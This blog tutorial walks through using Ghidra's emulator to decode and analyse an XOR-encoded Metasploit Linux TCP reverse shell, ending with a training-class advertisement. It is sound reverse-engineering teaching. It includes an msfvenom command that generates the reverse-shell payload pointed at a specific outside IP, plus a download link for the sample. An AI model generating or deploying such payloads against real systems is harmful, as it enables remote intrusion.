Unpacking Shellcode with Ghidra Emulator

Craig Young
Jun 4, 2023

It is pretty common for malware authors to decode and execute payloads in memory to avoid detection and complicate analysis. In this post, I will decode and start analyzing an XOR-encoded Metasploit TCP reverse shell to show how to get started using Ghidra to emulate a payload.

The sample for this post can be downloaded from https://secur3.us/GhidraFiles/payload or can be generated with msfvenom:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=104.236.191.89 -f elf -e x64/xor

The exercise begins by creating a new project in Ghidra and importing the sample file.

Import using the discovered properties

Opening the program in CodeBrowser and performing auto-analysis reveals the following listing:

Memory starting at 0x40009f is rewritten by the XOR at 0x400093

Reading through this listing, we can see that it loads the address of the entry function (0x400078) into RAX and then, with the xor instruction at 0x400093, writes XOR results to a location 0x27 bytes into entry. Since 0x400078+0x27 brings us to 0x40009f, this is the address that Ghidra has already flagged with a RW reference from the xor instruction at 0x400093. The decompiler output shows something similar and indicates that it encountered bad instruction data:
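The address arithmetic is easy to double-check outside of Ghidra. This is only a quick sanity check using the addresses from the listing above; the variable names are mine.

```python
# Addresses taken from the listing discussed above.
ENTRY = 0x400078      # start of the entry function (loaded into RAX)
XOR_INSN = 0x400093   # address of the xor instruction
DISPLACEMENT = 0x27   # offset used by the xor's memory operand

# First address rewritten by the decoder.
target = ENTRY + DISPLACEMENT
print(hex(target))

# How far into entry the xor instruction itself sits.
print(hex(XOR_INSN - ENTRY))
```

The first value printed is the start of the encoded region, which sits just past the xor instruction inside the same function.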

Decompiled entry has bad instructions

The program will run an XOR decoding loop to rewrite itself at runtime, transforming those bad bytes into valid instructions. With this understanding of the code, we can open the program in the stand-alone Emulator tool and let it run the XOR loop by clicking Debugger->Emulate Program in New Trace (or by clicking the emulator icon).
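For intuition, a decoding loop of this kind can be sketched in a few lines of Python. This is a rough model, not the actual decoder stub: it assumes the loop XORs successive 8-byte blocks with a fixed 64-bit key, and the key and data below are made up for illustration.

```python
import struct

def xor_qwords(blob: bytes, key: int) -> bytes:
    """XOR every 8-byte little-endian block of blob with a 64-bit key."""
    if len(blob) % 8:
        raise ValueError("blob length must be a multiple of 8")
    out = bytearray()
    for (block,) in struct.iter_unpack("<Q", blob):
        out += struct.pack("<Q", block ^ key)
    return bytes(out)

# Hypothetical key and stand-in "payload" bytes (not taken from the sample).
KEY = 0x1122334455667788
plain = bytes(range(16))

# XOR is its own inverse: encoding and decoding are the same operation.
encoded = xor_qwords(plain, KEY)
decoded = xor_qwords(encoded, KEY)
print(decoded == plain)
```

Because XOR is symmetric, the same routine both encodes and decodes. The emulator lets us skip recovering the key by hand and simply run the sample's own loop.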

Emulator started for entry

The plan from here is to let it run through the decoding loop and then inspect the dynamic listing. Set an SW_EXECUTE breakpoint at 0x40009f to recognize when the loop has completed.

Press ‘k’ to set a breakpoint after the loop

After setting the breakpoint, use the Emulator controls to resume execution (the resume/play icon works) and you should see control reach the breakpoint.

Static Listing at Breakpoint

Switching to the Dynamic listing at this point (Window->Listing->Dynamic) shows that the bytes have been re-written.

Decoded instructions after XOR loop

We can now extract the decoded data into a program segment for independent analysis. To do this, highlight the bytes, right-click the selection, and choose the Extract and Import… option from the context menu.

Extracting decoded bytes

Notice that the dialog asks, ‘Please select a language.’ This gives us the opportunity to choose a different language for the extracted code.

Select a Language

I have selected the little-endian 64-bit x86 with gcc, but of course we know that this was not compiled by gcc. Other language selections here may improve or degrade your analysis output.

Import parameters

After clicking OK on this prompt, click Yes to analyze the new segment:

Click Yes to analyze

The new segment is now included in the Ghidra project in a subfolder named after the program (payload).

Payload segment Listing

Disassemble this by pressing ‘D’ to reveal the shellcode:

Shellcode listing

And then in the Decompile view:

Decompiled shellcode

The shellcode uses the SYSCALL instruction, which Ghidra’s decompiler represents as a generic syscall() instead of resolving it to the specific Linux system call invoked. As a result, the decompiled view does not contain enough information to understand the deobfuscated code. Fortunately, Ghidra ships with an example script demonstrating how to use a memory overlay to resolve syscall numbers to function placeholders so that we see appropriate names and signatures instead of syscall().
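The core idea of resolving a syscall number to a name can be illustrated with a small lookup table. This is not how the Ghidra script is implemented; it is only a sketch of the number-to-name mapping, using the x86-64 Linux numbers for the four calls that show up later in this post. The fallback naming is my own.

```python
# Subset of the x86-64 Linux syscall table (the number is passed in RAX).
LINUX_X64_SYSCALLS = {
    33: "dup2",
    41: "socket",
    42: "connect",
    59: "execve",
}

def resolve_syscall(number: int) -> str:
    """Return the syscall name, or a generic placeholder if unknown."""
    return LINUX_X64_SYSCALLS.get(number, f"syscall_{number:#x}")

for n in (41, 42, 33, 59, 0x999):
    print(n, resolve_syscall(n))
```

A full resolver also has to work out which value is in RAX at each SYSCALL instruction, which is the harder part and the reason a script is useful here.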

Open Script Manager from the Window menu and search for ‘SyscallsScript’ to find it:

Find ‘ResolveX86orX64LinuxSyscallsScript.java’ in Script Manager

Unfortunately, this script was not designed to be run on a program segment and does not like the available metadata. If you run the script you will get an error as follows:

Error when running unmodified script

Right-click the script and open it in the basic editor to apply a quick patch by commenting out the check as shown in the highlighted section below.

Comment out the check for a Linux program

After adding the comments, you will need to save the script under a new name before it can be run:

Save the script with a new name

Running the updated script and returning to the decompiled segment output, we see:

Decoded shellcode with syscalls resolved

I will leave the rest of the analysis to the reader, but from here we can already see that the four syscalls have been renamed and given appropriate signatures for socket, connect, dup2, and execve, which should give a pretty clear indication of what the shellcode is doing.
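As a starting point for that analysis, the argument to connect is worth decoding. The sketch below assumes the shellcode builds its sockaddr_in from a single 64-bit immediate, and it assumes msfvenom's default LPORT of 4444 since the command above does not set one. The constant is constructed from those assumptions rather than copied from the sample, so compare it against what you see in your own listing.

```python
import socket
import struct

def parse_sockaddr_in(qword: int):
    """Split a 64-bit immediate into (family, port, ip) as sockaddr_in fields."""
    raw = struct.pack("<Q", qword)           # bytes as they sit in memory
    (family,) = struct.unpack("<H", raw[0:2])  # sin_family, host byte order
    (port,) = struct.unpack(">H", raw[2:4])    # sin_port, network byte order
    ip = socket.inet_ntoa(raw[4:8])            # sin_addr, network byte order
    return family, port, ip

# Hypothetical immediate built from LHOST=104.236.191.89 and an assumed port 4444.
example = 0x59BFEC685C110002
print(parse_sockaddr_in(example))
```

A family value of 2 corresponds to AF_INET on Linux, so a result like this would point at an IPv4 TCP connection back to the LHOST given to msfvenom.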

Join Me At Black Hat To Learn More

As always, I hope you have enjoyed reading this post. If you found this interesting and want to learn more, please consider joining me in Vegas this summer for ‘A Guide to Reversing with Ghidra’. The class is offered twice, Saturday/Sunday and Monday/Tuesday. Spaces are filling up quickly so please reserve your space today!

Weekend Class Registration

Monday/Tuesday Registration

UPDATE 3/2/24: Registration is currently open for “A Basic Guide to Bug Hunting with Ghidra” at Black Hat USA 2024. The two day class will be offered August 3–4 and again August 5–6.

Craig Young

I’m a 15-year veteran of the infosec industry with 200+ CVEs, two USENIX papers, a Pwnie award, and a bunch of bounties to my name. Currently teaching Ghidra.